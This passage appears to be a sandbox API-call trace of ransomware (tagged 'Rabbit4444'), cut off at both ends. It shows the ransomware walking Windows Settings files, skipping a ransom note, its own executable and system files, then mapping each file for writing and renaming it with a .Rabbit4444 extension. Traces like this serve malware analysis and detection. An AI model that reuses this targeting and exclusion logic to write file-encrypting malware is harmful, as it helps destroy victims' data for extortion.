(lpString="AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms") returned 65 [0057.904] lstrlenW (lpString="Rabbit4444") returned 10 [0057.904] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.904] lstrlenW (lpString=".dll") returned 4 [0057.904] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.904] lstrlenW (lpString=".lnk") returned 4 [0057.904] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.904] lstrlenW (lpString=".ini") returned 4 [0057.904] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.904] lstrlenW (lpString=".sys") returned 4 [0057.904] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.904] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_sleeptimeoutdc.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.904] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.904] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14921492947) returned 1 [0057.904] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1282) returned 1 [0057.904] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.904] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.904] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.905] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.906] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.906] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.906] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.906] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.906] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.907] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14921744309) returned 1 [0057.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.907] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.907] CloseHandle (hObject=0x298) returned 1 [0057.907] CloseHandle (hObject=0x278) returned 1 [0057.907] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms.Rabbit4444") returned 193 [0057.907] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_sleeptimeoutdc.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_SleepTimeoutDC.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_sleeptimeoutdc.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.908] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c774e1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x35c774e1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", cAlternateFileName="AA1A7E~1.SET")) returned 1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.908] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.908] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms") returned="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms" [0057.908] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.909] lstrlenW (lpString="AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms") returned 65 [0057.909] lstrlenW (lpString="Rabbit4444") returned 10 [0057.909] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.909] lstrlenW (lpString=".dll") returned 4 [0057.909] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.909] lstrlenW (lpString=".lnk") returned 4 [0057.909] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.909] lstrlenW (lpString=".ini") returned 4 [0057.909] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.909] lstrlenW (lpString=".sys") returned 4 [0057.909] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.909] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_advertisingidenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.909] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.909] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14921988627) returned 1 [0057.909] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1266) returned 1 [0057.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.909] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.910] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.911] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.911] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.912] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.912] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.912] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14922270782) returned 1 [0057.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.912] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.912] CloseHandle (hObject=0x298) returned 1 [0057.912] CloseHandle (hObject=0x278) returned 1 [0057.912] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms.Rabbit4444") returned 193 [0057.912] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_advertisingidenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_AdvertisingIdEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_advertisingidenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.913] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35df4c8f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x35df4c8f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", cAlternateFileName="AA2357~1.SET")) returned 1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2=".") returned 1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="..") returned 1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="windows") returned -1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="boot") returned -1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.913] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.913] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms") returned="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms" [0057.913] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.914] lstrlenW (lpString="AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms") returned 67 [0057.914] lstrlenW (lpString="Rabbit4444") returned 10 [0057.914] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.914] lstrlenW (lpString=".dll") returned 4 [0057.914] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.914] lstrlenW (lpString=".lnk") returned 4 [0057.914] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.914] lstrlenW (lpString=".ini") returned 4 [0057.914] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.914] lstrlenW (lpString=".sys") returned 4 [0057.914] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_backgroundapps_subtext.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.914] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.914] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14922500426) returned 1 [0057.914] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1304) returned 1 [0057.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0057.914] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.915] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.917] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14922770776) returned 1 [0057.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0057.917] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.917] CloseHandle (hObject=0x298) returned 1 [0057.917] CloseHandle (hObject=0x278) returned 1 [0057.917] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms.Rabbit4444") returned 195 [0057.917] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_backgroundapps_subtext.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_BackgroundApps_SubText.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_backgroundapps_subtext.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.918] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363c47f6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x363c47f6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", cAlternateFileName="AAD362~1.SET")) returned 1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2=".") returned 1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="..") returned 1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="windows") returned -1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="boot") returned -1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.918] lstrcmpiW (lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.918] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms") returned="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms" [0057.918] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.919] lstrlenW (lpString="AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms") returned 74 [0057.919] lstrlenW (lpString="Rabbit4444") returned 10 [0057.919] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.919] lstrlenW (lpString=".dll") returned 4 [0057.919] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.919] lstrlenW (lpString=".lnk") returned 4 [0057.919] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.919] lstrlenW (lpString=".ini") returned 4 [0057.919] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.919] lstrlenW (lpString=".sys") returned 4 [0057.919] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.919] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_privacy_enablecollectionofurlsappsuse.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.919] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.919] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14922993426) returned 1 [0057.919] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1311) returned 1 [0057.919] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.919] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.919] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.922] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.922] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.922] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.922] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.922] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.922] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.923] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14923359267) returned 1 [0057.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.923] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.923] CloseHandle (hObject=0x298) returned 1 [0057.923] CloseHandle (hObject=0x278) returned 1 [0057.923] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Privacy_EnableCollectionOfUrlsAppsUse.settingcontent-ms.Rabbit4444") returned 202 [0057.923] MoveFileExW 